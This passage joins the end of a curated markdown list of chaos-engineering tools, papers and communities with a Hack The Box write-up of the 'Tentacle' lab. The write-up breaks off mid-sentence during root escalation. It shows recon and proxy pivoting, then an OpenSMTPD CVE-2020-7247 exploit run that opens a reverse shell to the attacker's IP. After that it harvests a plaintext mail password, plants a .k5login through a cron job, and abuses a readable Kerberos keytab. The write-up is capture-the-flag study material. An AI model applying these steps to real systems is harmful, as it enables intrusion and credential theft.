Docker containers (and clusters).\n * [Blockade](https://github.com/worstcase/blockade) - Docker-based utility for testing network failures and partitions in distributed applications.\n* [chaos-lambda](https://github.com/bbc/chaos-lambda) - Randomly terminate ASG instances during business hours.\n* [Namazu](https://github.com/osrg/namazu) - Programmable fuzzy scheduler for testing distributed systems.\n* [Chaos Monkey for Spring Boot](https://codecentric.github.io/chaos-monkey-spring-boot/) - Injects latencies, exceptions, and terminations into Spring Boot applications\n* [Byte-Monkey](https://github.com/mrwilson/byte-monkey) - Bytecode-level fault injection for the JVM. It works by instrumenting application code on the fly to deliberately introduce faults like exceptions and latency.\n* [GomJabbar](https://github.com/outbrain/GomJabbar) - ChaosMonkey for your private cloud\n* [Turbulence](https://github.com/cppforlife/turbulence-release) - Tool focused on BOSH environments capable of stressing VMs, manipulating network traffic, and more. It is very simmilar to Gremlin.\n* [chaosblade](https://github.com/chaosblade-io/chaosblade) - An Easy to Use and Powerful Chaos Engineering Toolkit.\n* [KubeInvaders](https://github.com/lucky-sideburn/KubeInvaders) - Gamfied Chaos engineering tool for Kubernetes Clusters\n* [Cthulhu](https://github.com/xmatters/cthulhu-chaos-testing) - Chaos Engineering tool that helps evaluating the resiliency of microservice systems simulating various disaster scenarios against a target infrastructure in a data-driven manner.\n* [VMware Mangle](https://vmware.github.io/mangle/) - Orchestrating Chaos Engineering.\n* [Byteman](https://byteman.jboss.org/) - A Swiss Army Knife for Byte Code Manipulation.\n* [Litmus](https://github.com/litmuschaos/litmus) - Framework for Kubernetes environments that enables users to run test suites, capture logs, generate reports and perform chaos tests.\n* [Perses](https://github.com/nicolasmanic/perses) - A project to cause (controlled) destruction to a JVM application.\n* [ChaosKube](https://github.com/linki/chaoskube) - chaoskube periodically kills random pods in your Kubernetes cluster. \n* [Chaos Mesh](https://github.com/chaos-mesh/chaos-mesh) - Chaos Mesh is a cloud-native Chaos Engineering platform that orchestrates chaos on Kubernetes environments.\n* [failure-lambda](https://github.com/gunnargrosch/failure-lambda) - A small Node module for injecting failure into AWS Lambda using latency, exception, statuscode or diskspace.\n* [aws-chaos-scripts](https://github.com/adhorn/aws-chaos-scripts) - Collection of python scripts to run failure injection on AWS infrastructure\n* [chaos-ssm-documents](https://github.com/adhorn/chaos-ssm-documents) - Collection of AWS SSM Documents to perform Chaos Engineering experiments\n* [aws-lambda-chaos-injection](https://github.com/adhorn/aws-lambda-chaos-injection) - A library injecting chaos into AWS Lambda. It offers simple python decorators to do delay, exception and statusCode injection and a Class to add delay to any 3rd party dependencies.\n* [chaos-dingo](https://github.com/jmspring/chaos-dingo) - A tool to mess with Azure services using the Azure NodeJS SDK.\n* [Chaos HTTP Proxy](https://github.com/bouncestorage/chaos-http-proxy) - Introduce failures into HTTP requests via a proxy server\n* [Chaos Lemur](https://github.com/strepsirrhini-army/chaos-lemur) - A self-hostable application to randomly destroy virtual machines in a BOSH-managed environment\n* [Simoorg](https://github.com/linkedin/simoorg) - Linkedin’s very own failure inducer framework.\n* [react-chaos](https://github.com/jchiatt/react-chaos) - A chaos engineering tool for your React apps\n* [vue-chaos](https://github.com/aviadhahami/vue-chaos) - A chaos engineering tool for your Vue apps\n* [Chaos Engine](https://github.com/ThalesGroup/chaos-engine) - tool designed to intermittently destroy or degrade application resources running in cloud based infrastructure. [Documentation](https://thalesgroup.github.io/chaos-engine/)\n* [kubedoom](https://github.com/storax/kubedoom) - Kill Kubernetes pods by playing Id's DOOM.\n* [kubethanos](https://github.com/berkay-dincer/kubethanos) - Kills half of your randomly selected Kubernetes pods.\n* [go-fault](https://github.com/github/go-fault) - Fault injection middleware in Go\n* [Proofdock's Chaos Engineering Platform](https://proofdock.io) - A chaos engineering platform that seamlessly integrates in Azure DevOps and has a focus on the Azure cloud platform.\n* [Pystol](https://www.pystol.org/docs) - Pystol is a fault injection platform allowing users to execute fault injection Actions in cloud-native environments in a controlled and prescribed way.\n* [AWSSSMChaosRunner](https://github.com/amzn/awsssmchaosrunner) - Amazon's light-weight open-source library for chaos engineering on AWS. It can be used for [EC2](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/concepts.html), [ECS (with EC2 launch type)](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/getting-started-ecs-ec2.html) and [Fargate](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/getting-started-fargate.html).\n* [Kraken](https://github.com/cloud-bulldozer/kraken) - Chaos and resiliency testing tool for Kubernetes and OpenShift.\n* [kube-burner](https://github.com/cloud-bulldozer/kube-burner) - A tool aimed at stressing Kubernetes clusters by creating or deleting a high quantity of objects.\n* [Chaos Experimentation Framework](https://github.com/lyft/clutch) - An extensible platform for infrastructure management including Chaos Engineering \n* [NetHavoc](https://www.cavisson.com/nethavoc-resilience-testing-solution/) - A Chaos Engineering Tool for Linux, K8s, Windows, PCF, Cloud, and Containers for injecting Resource, Infrastructure, Network, and Application failures.\n* [gorm-sqlchaos](https://github.com/u2386/gorm-sqlchaos) - A runtime SQL manipulator for your Golang applications based on gorm.\n* [Chaos Frontend Toolkit](https://chaos-frontend-toolkit.web.app/) - A set of tools to apply Chaos Engineering to frontend\n* [Mitigant](https://mitigant.io/) - The Continuos Security Verification Platform, enables confidence in cloud security posture by leveraging security chaos engineering.\n\n## Retired tools\n* [The Simian Army](https://github.com/Netflix/SimianArmy) - A suite of tools for keeping your cloud operating in top form.\n* [ChaoSlingr](https://github.com/Optum/ChaoSlingr) - Introducing Security Chaos Engineering. ChaoSlingr focuses primarily on the experimentation on AWS Infrastructure to proactively instrument system security failure through experimentation.\n\n## Cloud Services\n* [Testing Amazon Aurora Using Fault Injection Queries](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/AuroraMySQL.Managing.html#AuroraMySQL.Managing.FaultInjectionQueries)\n* [Azure Chaos Studio](https://aka.ms/azurechaosstudio) - A managed fault injection service for Azure applications. See also [Azure Fault Analysis Service](https://docs.microsoft.com/azure/service-fabric/service-fabric-testability-overview) for Azure Service Fabric applications.\n* [Security Chaos Engineering for Cloud Services](https://medium.com/@run2obtain/from-resilience-to-dependability-security-chaos-engineering-for-cloud-services-9c6d6d152ed2)\n\n## Papers\n* [Maelstrom: Mitigating Datacenter-level Disasters by Draining Interdependent Traffic Safely and Efficiently](https://www.usenix.org/system/files/osdi18-veeraraghavan.pdf)\n* [Simple Testing Can Prevent Most Critical Failures: An Analysis of Production Failures in Distributed Data-Intensive Systems](https://www.usenix.org/system/files/conference/osdi14/osdi14-paper-yuan.pdf)\n* [Automating Failure Testing Research at Internet Scale ](https://people.ucsc.edu/~palvaro/fit-ldfi.pdf)\n* [Principles of Antifragile Software](https://arxiv.org/abs/1404.3056)\n* [Why is random testing effective for partition tolerance bugs?](https://dl.acm.org/citation.cfm?id=3177123.3158134)\n* [Chaos Engineering](https://arxiv.org/abs/1702.05843)\n* [A Platform for Automating Chaos Experiments](https://arxiv.org/abs/1702.05849)\n* [A Chaos Engineering System for Live Analysis and Falsification of Exception-handling in the JVM](https://arxiv.org/abs/1805.05246)\n* [TripleAgent: Monitoring, Perturbation And Failure-obliviousness for Automated Resilience Improvement in Java Applications](https://arxiv.org/abs/1812.10706)\n* [Lineage-driven Fault Injection](https://dl.acm.org/citation.cfm?id=2723711)\n* [Antifragility is a Fragile Concept](https://www.linkedin.com/pulse/antifragility-fragile-concept-casey-rosenthal/)\n* [Chaos Engineering Security](https://jaxenter.com/chaos-engineering-security-163358.html)\n* [Security Chaos Engineering: A new paradigm for cybersecurity](https://opensource.com/article/18/1/new-paradigm-cybersecurity)\n* [Security Challenges around Chaos Engineering](https://www.conjur.org/blog/security-challenges-around-chaos-engineering/)\n* [CloudStrike: Security Chaos Engineering for Cloud Services](https://www.researchgate.net/publication/335922038_Security_Chaos_Engineering_for_Cloud_Services)\n* [Observability and Chaos Engineering on System Calls for Containerized Applications in Docker](https://arxiv.org/abs/1907.13039)\n* [Maximizing Error Injection Realism for Chaos Engineering with System Calls](https://arxiv.org/abs/2006.04444)\n* [Chaos Engineering of Ethereum Blockchain Clients](https://arxiv.org/abs/2111.00221)\n\n## Gamedays\n* [Target: What is a Gameday?](https://tech.target.com/2019/05/09/chaos-engineering-at-Target.html) - Chaos Gamedays experience by Target.\n* [Codecentric: Chaos Engineering Gamedays](https://blog.codecentric.de/en/2018/08/chaos-engineering-gameday/) - Chaos Gamedays by Codecentric.\n* [New Relic: How to run a Gameday?](https://blog.newrelic.com/engineering/how-to-run-a-game-day/) - Chaos Gamedays experience by New Relic.\n* [Dius: Gamedays resources](https://dius.com.au/resources/game-day/) - Resources for getting started with GameDay and Chaos Engineering.\n* [Gremlin: Gamedays](https://www.gremlin.com/gameday/) - Resources for getting started with GameDay and Chaos Engineering.\n* [Gremlin: What is a Chaos Day?](https://www.gremlin.com/community/tutorials/planning-your-own-chaos-day/#what-is-a-chaos-day) - What is a Gameday according Gremlin.\n* [Gremlin: Why run a Chaos Day?](https://www.gremlin.com/community/tutorials/planning-your-own-chaos-day/#why-run-a-chaos-day) - Reasons to run Gamedays according Gremlin.\n* [Gremlin: How to run a Gameday?](https://www.gremlin.com/community/tutorials/how-to-run-a-gameday/) - Methodology to run Gamedays according Gremlin. \n* [Gremlin DB: Breaking Dynamo DB](https://www.gremlin.com/community/tutorials/gremlin-gameday-breaking-dynamodb/) - Example of a Gameday with DynamoDB by Gremlin.\n* [Gremlin: Introduction to Gameday](https://www.gremlin.com/community/tutorials/introduction-to-gamedays/) - What is a Gameday according Gremlin.\n* [Gremlin: Planning your own Chaos Day](https://www.gremlin.com/community/tutorials/planning-your-own-chaos-day/) - Example of a Gameday with DynamoDB by Gremlin.\n* [Gremlin: Inside Gremlin 2019 Gremlin Gamedays Roadmap](https://www.gremlin.com/community/tutorials/inside-gremlin-2019-gremlin-gamedays-roadmap/) - Chaos Gamedays experience by Gremlin.\n* [Gremlin: What I lerned running the Chaos Lab with Kafka](https://www.gremlin.com/community/tutorials/what-i-learned-running-the-chaos-lab-kafka-breaks/) - Example of a Gameday with Kafka by Gremlin.\n* [Chaos Toolkit: Chaos Engineering with Humans in the loop](https://medium.com/chaos-toolkit/chaos-engineering-with-humans-in-the-loop-f4854900b1eb) - Article about Chaos Gamedays.\n* [GooCardless: All fun and games until you start with Gamedays](https://gocardless.com/blog/game-days-at-gc/) - Article about Chaos Gamedays.\n* [InfoQ: Gamedays - Achieving Resilience through Chaos Engineering](https://www.infoq.com/presentations/gameday-chaos-engineering) - InfoQ Presentation with experiences about Chaos Gamedays.\n\n## Blogs & Newsletters\n* [Netflix Technology Blog](https://medium.com/@NetflixTechBlog) - Learn more about how Netflix designs, builds, and operates our systems and engineering organizations.\n* [Production Ready](https://tinyletter.com/production-ready) - A mailing list about building resilient infrastructure and tools.\n* [SRE Weekly](https://sreweekly.com/) - Weekly Site Reliability Newsletter.\n* [Site Reliability Engineering resources](https://github.com/dastergon/awesome-sre) - A curated list of awesome Site Reliability and Production Engineering resources.\n* [SysAdvent](https://sysadvent.blogspot.com) - One article for each day of December, ending on the 25th article.\n* [Gremlin Blog](https://blog.gremlininc.com) - Blogs on Chaos Engineering from Gremlin Inc.\n* [O’Reilly Systems Engineering and Operations Newsletter](http://www.oreilly.com/webops-perf/newsletter.html) - Weekly systems engineering and operations news and insights from industry insiders.\n* [LaunchDarkly Blog](http://blog.launchdarkly.com/) - Continuous delivery and feature flags blog.\n* [Verica](https://www.verica.io/) - Chaos engineering, security chaos engineering and continuous verification.\n* [Proofdock](https://medium.com/proofdock) - Reliability, resilience and chaos engineering with a focus on MS Azure\n* [LitmusChaos Blog](https://dev.to/t/litmuschaos/latest) - Blogs on Chaos Engineering from LitmusChaos\n* [ChaosEngineering.news](https://chaosengineering.news/) - Chaos Engineering newsletter. All things chaos engineering, directly to your inbox!\n* [Chaos Mesh Blog](https://chaos-mesh.org/blog) - Blogs on Chaos Engineering from Chaos Mesh.\n* [Chaos Experimentation Framework](https://eng.lyft.com/chaos-experimentation-an-open-source-framework-built-on-top-of-envoy-proxy-df87519ed681) Chaos Experimentation, an open-source framework built on top of Envoy Proxy\n* [Squadcast](https://squadcast.com/blog)- Blog on Site Reliability engineering.\n* [steadybit Blog](https://www.steadybit.com/blog) - Blogs on Chaos Engineering, Resilience, SRE and OPS from steadybit.\n\n## Podcasts\n* [Break Things On Purpose](https://podcasts.apple.com/us/podcast/break-things-on-purpose/id1460542551) - Monthly podcast about Chaos Engineering presented by Gremlin Inc. Also available on Spotify, Google Play, and Stitcher.\n\n## Conferences & Meetups\n* [Chaos Carnival](https://chaoscarnival.io/) - A global two-day virtual conference for Cloud Native Chaos Engineering. \n* [Chaos Conf](https://chaosconf.splashthat.com/) - A day of Chaos Engineering demos, expert advice, and connect with your peers putting chaos into practice at their companies.\n* [SRECon Conferences](https://www.usenix.org/conferences/byname/925) - The official SRE conference.\n* [LISA Conferences](https://www.usenix.org/conferences/byname/5) - Prominent conference about SysAdmin/DevOps/SRE.\n* [O'Reilly Velocity Conference](https://conferences.oreilly.com/velocity/) - Prominent conference about Systems Engineering/DevOps/SRE.\n* [Chaos Engineering Community Meetup Group](https://www.meetup.com/Chaos-Engineering-Community/) - Bay Area Meetup group for Chaos Engineers.\n* [London Chaos Engineering Community](https://www.meetup.com/London-Chaos-Engineering-Community/) _ London Area Meetup group for Chaos Engineers.\n* [Stockholm Chaos Engineering Meetup](https://www.meetup.com/Stockholm-Chaos-Engineering-Community/) Stockholm Meetup group for Chaos Engineers.\n* [Chaos Engineering Community](https://www.meetup.com/pro/chaos/) - A collection of meetups across the globe about Chaos Engineerings.\n* [Conf42.com: Chaos Engineering](https://conf42.com) - Chaos Engineering for practitioners and adopters - London UK, 23 Jan 2020.\n* [Kubernetes Chaos Engineering Meetup Group India](https://www.meetup.com/Kubernetes-Chaos-Engineering-Meetup-Group-India/)- India Meetup group for Chaos Engineers.\n\n## Forums\n* [Chaos Community Google Group](https://groups.google.com/forum/#!forum/chaos-community)\n* [Chaos Engineering LinkedIn Group](https://www.linkedin.com/groups/7057761)\n* [Chaos Engineering Slack Community](https://gremlin.com/community)\n* [CNCF Chaos Engineering Working Group](https://groups.google.com/forum/#!forum/chaoseng-wg)\n* CNCF Chaos Engineering Working Group Slack: #chaosengineering (slack.cncf.io)\n* [CNCF Chaos Engineering Working Group Github](https://github.com/chaoseng/wg-chaoseng)\n* [Chaos Toolkit Slack Community](https://join.chaostoolkit.org)\n* [Litmus Chaos Engineering Slack Community](https://slack.litmuschaos.io/)\n\n## Contributing\n\nPlease take a look at the [contribution guidelines](CONTRIBUTING.md) first. Contributions are always welcome!\n"
3,"<p align=""center""><img src=""src/banner.png"" alt=""Banner""></img></p>\n<p align=""center"">Creator: <a href=""https://app.hackthebox.eu/polarbearer/159204"">polarbearer</a></p>\n\n# Personal thoughts\nA hard box which has less solvers even than an insane box! Made me learn a lot of stuff like dns records, proxychaining, kerberos and so on... As usual, I tried to explain the steps as simple as I can. Hope you'll find it useful; if so, consider [suporting](https://www.buymeacoffee.com/f4T1H21) a student to get `OSCP` exam and +respecting my profile in HTB.\n\n<a href=""https://app.hackthebox.eu/profile/184235"">\n <img src=""https://www.hackthebox.eu/badge/image/184235"" alt=""f4T1H"">\n </img>\n</a>\n<br>\n<a href=""https://www.buymeacoffee.com/f4T1H21"">\n <img src=""https://raw.githubusercontent.com/f4T1H21/f4T1H21/main/support.png"" height=""40"" alt=""Support"">\n </img>\n</a><br><br>\nNow, let me get right into it.\n\n---\n\n# Reconnaissance\nThe cliche... :\n```bash\nnmap -sS -sV -sC -p- 10.10.10.224\n```\n```bash\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 8.0 (protocol 2.0)\n| ssh-hostkey:\n| 3072 8d:dd:18:10:e5:7b:b0:da:a3:fa:14:37:a7:52:7a:9c (RSA)\n| 256 f6:a9:2e:57:f8:18:b6:f4:ee:03:41:27:1e:1f:93:99 (ECDSA)\n|_ 256 04:74:dd:68:79:f4:22:78:d8:ce:dd:8b:3e:8c:76:3b (ED25519)\n53/tcp open domain ISC BIND 9.11.20 (RedHat Enterprise Linux 8)\n| dns-nsid:\n|_ bind.version: 9.11.20-RedHat-9.11.20-5.el8\n88/tcp open kerberos-sec MIT Kerberos (server time: 2021-06-17 12:49:01Z)\n3128/tcp open http-proxy Squid http proxy 4.11\n|_http-server-header: squid/4.11\n|_http-title: ERROR: The requested URL could not be retrieved\n9090/tcp closed zeus-admin\nService Info: Host: REALCORP.HTB; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:8\n```\n\nHere we have three ports except `22/ssh`, let's start with the kerberos server at the port `88/kerberos-sec`.\n\n## 88/kerberos-sec\n\nActually, we don't have much choice here, let's take a look at the binary web content:\n```bash\ncurl http://10.10.10.224:88 --http0.9 --output - | strings\n```\n```\n`~^0\\n20210618150926Z\nREALCORP.HTB\nkrbtgt\nREALCORP.HTB\n```\nWe got two things here:\n- `REALCORP.HTB` which is a domain. (Also a clue about __default Kerberos 5 realm__)\n- `krbtgt` which is the local default account which acts as a service account for the Key Distribution Center (KDC) service.\n\nAdd the domain to `/etc/hosts` and let's continue with the port `3128/http-proxy`.\n\n## 3128/http-proxy\n![](src/3128browser.png)\n\nHere we got another two things:\n- `j.nakazawa@realcorp.htb` a username and another domain.\n- `srv01.realcorp.htb` a new __subdomain__.\n\nSee the subdomain? Maybe we need to enumerate the `53/dns` to find out what's going on.\n\n## 53/dns\nAs I mentioned my previous writeups, I love using `gobuster`. You can go with `dnsenum`, `wfuzz` or your own tool...\n- Let's go with the domain we found in the __mail__ address.\n\n```bash\n┌──(root💀kali)-[~/hackthebox/tentacle]\n└─> gobuster -q dns -d realcorp.htb -r 10.10.10.224:53 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -i\nFound: ns.realcorp.htb [10.197.243.77]\nFound: proxy.realcorp.htb [10.197.243.77]\nFound: wpad.realcorp.htb [10.197.243.31]\nFound: srv01.realcorp.htb [10.10.10.224]\n```\nOh, here we found new subdomains and two new ip addresses. `proxy.realcorp.htb` is a [`CNAME`](https://en.wikipedia.org/wiki/CNAME_record) record to `ns.realcorp.htb` and `ns` stands for nameserver.<br>\nAs you can guess, we can't access these ips directly, which means we need to use proxychaining to access them for this case.\n\n### `proxychains` configuration\nWe are going to use a tool called `proxychains`, so make sure you installed it on your system.<br>\nDo comment any other proxy entries and add the following lines at the end of your `/etc/proxychains.conf` file.\n```\nhttp\t10.10.10.224 3128\nhttp\t127.0.0.1 3128\nhttp\t10.197.243.77 3128\n```\nWe're going with `strict_chain` but you can go with `dynamic_chain` too.\n- Here's a [video](https://www.youtube.com/watch?v=NN9fQwiomAU) to understand `proxychains` mechanism.\n\nNow, we're ready to look at the ip: `10.197.243.31`<br>\nLet's scan it:\n```bash\n┌──(root💀kali)-[~/hackthebox/tentacle]\n└─> proxychains -q nmap -sT -Pn 10.197.243.31 --top-ports 1000\nHost discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.\nStarting Nmap 7.91 ( https://nmap.org ) at 2021-06-18 19:34 +03\nNmap scan report for wpad.realcorp.htb (10.197.243.31)\nHost is up (0.24s latency).\nNot shown: 993 closed ports\nPORT STATE SERVICE\n22/tcp open ssh\n53/tcp open domain\n80/tcp open http\n88/tcp open kerberos-sec\n464/tcp open kpasswd5\n749/tcp open kerberos-adm\n3128/tcp open squid-http\n\nNmap done: 1 IP address (1 host up) scanned in 241.18 seconds\n```\n\n### WPAD (Web Proxy Auto-Discovery Protocol)\n>[WPAD](https://en.wikipedia.org/wiki/Web_Proxy_Auto-Discovery_Protocol) is a method used by clients to locate the URL of a configuration file using DHCP and/or DNS discovery methods. Once detection and download of the configuration file is complete, it can be executed to determine the proxy for a specified URL. Default name for the configuration file is: `wpad.dat`\n\nHere we see an http server, let's look for the file.\n\n- First add `10.197.243.31 wpad.realcorp.htb` to your `/etc/hosts`.\n\n```bash\n┌──(root💀kali)-[~/hackthebox/tentacle]\n└─> proxychains -q curl http://wpad.realcorp.htb/wpad.dat\nfunction FindProxyForURL(url, host) {\n if (dnsDomainIs(host, ""realcorp.htb""))\n return ""DIRECT"";\n if (isInNet(dnsResolve(host), ""10.197.243.0"", ""255.255.255.0""))\n return ""DIRECT"";\n if (isInNet(dnsResolve(host), ""10.241.251.0"", ""255.255.255.0""))\n return ""DIRECT"";\n\n return ""PROXY proxy.realcorp.htb:3128"";\n}\n```\n\nThis time we catch a tartar, that's a totally new `subnet`...<br>\nWe can't use host discovery in `nmap`, that makes things too long. But I used my mind and made things easier; while scanning the whole ip range, I encountered one ` ... OK` and moved from that ip address.\n\n![](src/subnetscan.png)\n\n# Foothold: CVE 2020-7247\nLet's scan this ip address's running service versions:\n\n```bash\nproxychains nmap -sT -sV -Pn 10.241.251.113 --top-ports 100\n```\n```c\nPORT STATE SERVICE VERSION\n25/tcp open smtp OpenSMTPD\nService Info: Host: smtp.realcorp.htb\n```\nAfter googling a bit about `OpenSMTPD`, I found [this](https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt) article. Now time to exploit it, I tried many exploits from the internet but I'm going to recommend you to use my PoC exploit from [this](https://github.com/f4T1H21/CVE-2020-7247) link. You can see, it definitely makes sense!\n\n```bash\n┌──(root💀f4T1H)-[~/hackthebox/tentacle]\n└─> proxychains -q python3 exploit.py 10.241.251.113 25 j.nakazawa@realcorp.htb 10.10.14.166 2121\n[+] Opening connection to 10.241.251.113 on port 25: Done\n[+] Target port is running OpenSMTPD!\n[+] Sending HELO: Done\n[+] Target is vulnerable!\n[+] Checking the mail address: Valid\n[+] Sending the payload: Done\n[*] Closed connection to 10.241.251.113 port 25\n---------------------------------------------------------\n[+] Trying to bind to 10.10.14.166 on port 2121: Done\n[+] Waiting for connections on 10.10.14.166:2121: Got connection from 10.10.10.224 on port 36780\n[*] Switching to interactive mode\nbash: cannot set terminal process group (545): Inappropriate ioctl for device\nbash: no job control in this shell\nroot@smtp:~> $ id\nid\nuid=0(root) gid=0(root) groups=0(root)\nroot@smtp:~> $\n```\nHere we finally got a shell as `root`, but in the `smtp` server.\nAfter a bit of enumeratig, I found `msmtp` client configuration file in `/home/j.nakazawa/.msmtprc`.\n\n```bash\nroot@smtp:/home/j.nakazawa> $ cat .msmtprc\ncat .msmtprc\n# Set default values for all following accounts.\ndefaults\nauth on\ntls on\ntls_trust_file /etc/ssl/certs/ca-certificates.crt\nlogfile /dev/null\n\n# RealCorp Mail\naccount realcorp\nhost 127.0.0.1\nport 587\nfrom j.nakazawa@realcorp.htb\nuser j.nakazawa\npassword sJB}RM>6Z~64_\ntls_fingerprint C9:6A:B9:F6:0A:D4:9C:2B:B9:F6:44:1F:30:B8:5E:5A:D8:0D:A5:60\n\n# Set a default account\naccount default : realcorp\nroot@smtp:/home/j.nakazawa> $\n```\nAnd here we got some credentials: `j.nakazawa`:`sJB}RM>6Z~64_`<br>\nBut weirdly ssh was not working for direct login with these credentials!<br><br>\nThinking about generally a little bit, gives us the big clue: As you can remember we have a `kerberos-sec` server on the main target, which means we can use tickets to authenticate in something if it configured properly!\n\n![](/src/gifs/bingobango.gif)\n\nOkay, let me take one step back:\n\n- What is `kerberos`?\n>A computer-network authentication protocol that works on the basis of tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner.\n\n## Creating a `kerberos` ticket\n### Step #1\nFirst install the package by typing:\n```bash\napt-get install krb5-user\n```\n\n__Attention__: Now we need to configure the kerberos by editing `/etc/krb5.conf`, for that you need to add following lines to their proper sections in the file.\n```bash\n[libdefaults]\n default_realm = REALCORP.HTB\n\n[realms]\n REALCORP.HTB = {\n kdc = 10.10.10.224\n }\n\n[domain_realm]\n .realcorp.htb = REALCORP.HTB\n```\n### Step #2\nCreate a ticket for the user `j.nakazawa`:\n```bash\n┌──(root💀f4T1H)-[~/hackthebox/tentacle]\n└─> kinit j.nakazawa\nPassword for j.nakazawa@REALCORP.HTB:\n\n```\nEnter the password, and we're ready to go. But first, check the ticket we created:\n```bash\n┌──(root💀f4T1H)-[~/hackthebox/tentacle]\n└─> klist \nTicket cache: FILE:/tmp/krb5cc_0\nDefault principal: j.nakazawa@REALCORP.HTB\n\nValid starting Expires Service principal\n06/19/2021 07:12:33 06/20/2021 07:00:21 krbtgt/REALCORP.HTB@REALCORP.HTB\n```\n\n__Atention__: Make sure you only have the following domain for the `10.10.10.224` ip address in your `/etc/hosts` file.\n```c\n10.10.10.224 srv01.realcorp.htb\n```\n## Step #3\nConnect directly via ssh as the user `j.nakazawa`:\n```bash\n┌──(root💀f4T1H)-[~/hackthebox/tentacle]\n└─> ssh j.nakazawa@10.10.10.224\nActivate the web console with: systemctl enable --now cockpit.socket\n\nLast login: Sat Jun 19 05:26:12 2021 from 10.10.14.166\n[j.nakazawa@srv01 ~]$ id\nuid=1000(j.nakazawa) gid=1000(j.nakazawa) groups=1000(j.nakazawa),23(squid),100(users) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\n[j.nakazawa@srv01 ~]$\n```\nHere we finally got the user ...\n\n# Privilege escalation:\n## Escalating `admin`: Cronjob abuse\nWhile enumerating the box, I came out with the following `cronjob`:\n```bash\n[j.nakazawa@srv01 ~]$ cat /etc/crontab\nSHELL=/bin/bash\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\n\n# For details see man 4 crontabs\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# | .------------- hour (0 - 23)\n# | | .---------- day of month (1 - 31)\n# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...\n# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# | | | | |\n# * * * * * user-name command to be executed\n* * * * * admin /usr/local/bin/log_backup.sh\n[j.nakazawa@srv01 ~]$\n```\n\n__/usr/local/bin/log_backup.sh__\n```bash\n#!/bin/bash\n\n/usr/bin/rsync -avz --no-perms --no-owner --no-group /var/log/squid/ /home/admin/\ncd /home/admin\n/usr/bin/tar czf squid_logs.tar.gz.`/usr/bin/date +%F-%H%M%S` access.log cache.log\n/usr/bin/rm -f access.log cache.log\n```\nBasically this script copies all the content of `/var/log/squid/` to `/home/admin`.\n\n```bash\n[j.nakazawa@srv01 tmp]$ id\nuid=1000(j.nakazawa) gid=1000(j.nakazawa) groups=1000(j.nakazawa),23(squid),100(users) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\n[j.nakazawa@srv01 tmp]$ ls /var/log -lah | grep squid\ndrwx-wx---. 3 admin squid 53 Jun 19 05:49 squid\n[j.nakazawa@srv01 tmp]$\n```\n\nHere you can see we are in the group of `squid`, we can write and execute the content of `/var/log/squid`. So if we put something into `/var/log/squid` it'll be copied to `/home/admin`. It may take a long or a short time depending on the size of the directory.<br><br>\nThe initial idea was copying our public ssh key to `/home/admin/.ssh/authorized_keys`, but after further testing I came out to the conclusion that it is not allowed/enabled.\n\nHmm let's think about the clue, you remember what was it? Yeah, you're right it is literally: `Kerberos`<br>\nAfter some googling, I got [this](https://web.mit.edu/kerberos/krb5-1.5/krb5-1.5.4/doc/krb5-user/Granting-Access-to-Your-Account.html) article.\n\n>If you need to give someone access to log into your account, you can do so through `Kerberos`, without telling the person your password. Simply create a file called `.k5login` in your home directory. This file should contain the `Kerberos principal` of each person to whom you wish to give access. Each principal must be on a separate line. Here is a sample `.k5login` file:\n```\njennifer@ATHENA.MIT.EDU\navid@EXAMPLE.COM\n```\n\nLet's try that:\n```bash\n[j.nakazawa@srv01 ~]$\nmkdir tmp\necho j.nakazawa@REALCORP.HTB | tee tmp/.k5login\ncp tmp/.k5login /var/log/squid\n\nyou@yourlocalmachine:~$\nssh admin@10.10.10.224\n```\n![](src/admin.png)\n\nYupp, that works!\n\n## Escalating `root`: Misconfigured keytab\nActually we noticed this file earlier but as we hadn't had permissions on that, we couldn't use it.<br>\nThe file is: `/etc/krb5.keytab` Fine but,\n\n- What is a [`keytab`](https://kb.iu.edu/d/aumh) file?\n>A keytab is a file containing pairs of Kerberos principals and encrypted keys (which are derived from the Kerberos password). You can use a keytab file to authenticate to various remote systems using Kerberos without entering a password. __Anyone with read permission on a keytab file can use all the keys in the file.__\n\n```bash\n[admin@srv01 ~]$ ls -l /etc/krb5.keytab\n-rw-r-----. 1 root admin 1403 Dec 19 06:10 /etc/krb5.keytab\n```\nYou see dear `r` letter at the 5th place which stands for __our read permission__'s existence?\n\nLet's see the principals inside `/etc/krb5.keytab`\n```bash\n[admin@srv01 ~]$ klist -k /etc/krb5.keytab\nKeytab name: FILE:/etc/krb5.keytab\nKVNO Principal\n---- --------------------------------------------------------------------------\n 2 host/srv01.realcorp.htb@REALCORP.HTB\n 2 host/srv01.realcorp.htb@REALCORP.HTB\n 2 host/srv01.realcorp.htb@REALCORP.HTB\n 2 host/srv01.realcorp.htb@REALCORP.HTB\n 2 host/srv01.realcorp.htb@REALCORP.HTB\n 2 kadmin/changepw@REALCORP.HTB\n 2 kadmin/changepw@REALCORP.HTB\n 2 kadmin/changepw@REALCORP.HTB\n 2 kadmin/changepw@REALCORP.HTB\n 2 kadmin/changepw@REALCORP.HTB\n 2 kadmin/admin@REALCORP.HTB\n 2 kadmin/admin@REALCORP.HTB\n 2 kadmin/admin@REALCORP.HTB\n 2 kadmin/admin@REALCORP.HTB\n 2 kadmin/admin@REALCORP.HTB\n[admin@srv01 ~]$\n```\n\nThere are `kadmin/admin@REALCORP.HTB` principals, nice!\n\nNow the only thing to do is using [`kadmin`](https://web.mit.edu/kerberos/krb5-1.12/doc/admin/admin_commands/kadmin_local.html) (Kerberos V5 administration system) to add a `root@REALCORP.HTB` principal which we can use with [`ksu`](https://web.mit.edu/kerberos/krb5-latest/doc/user/user_commands/ksu.html) (Kerberized version of the su program) to authenticate as 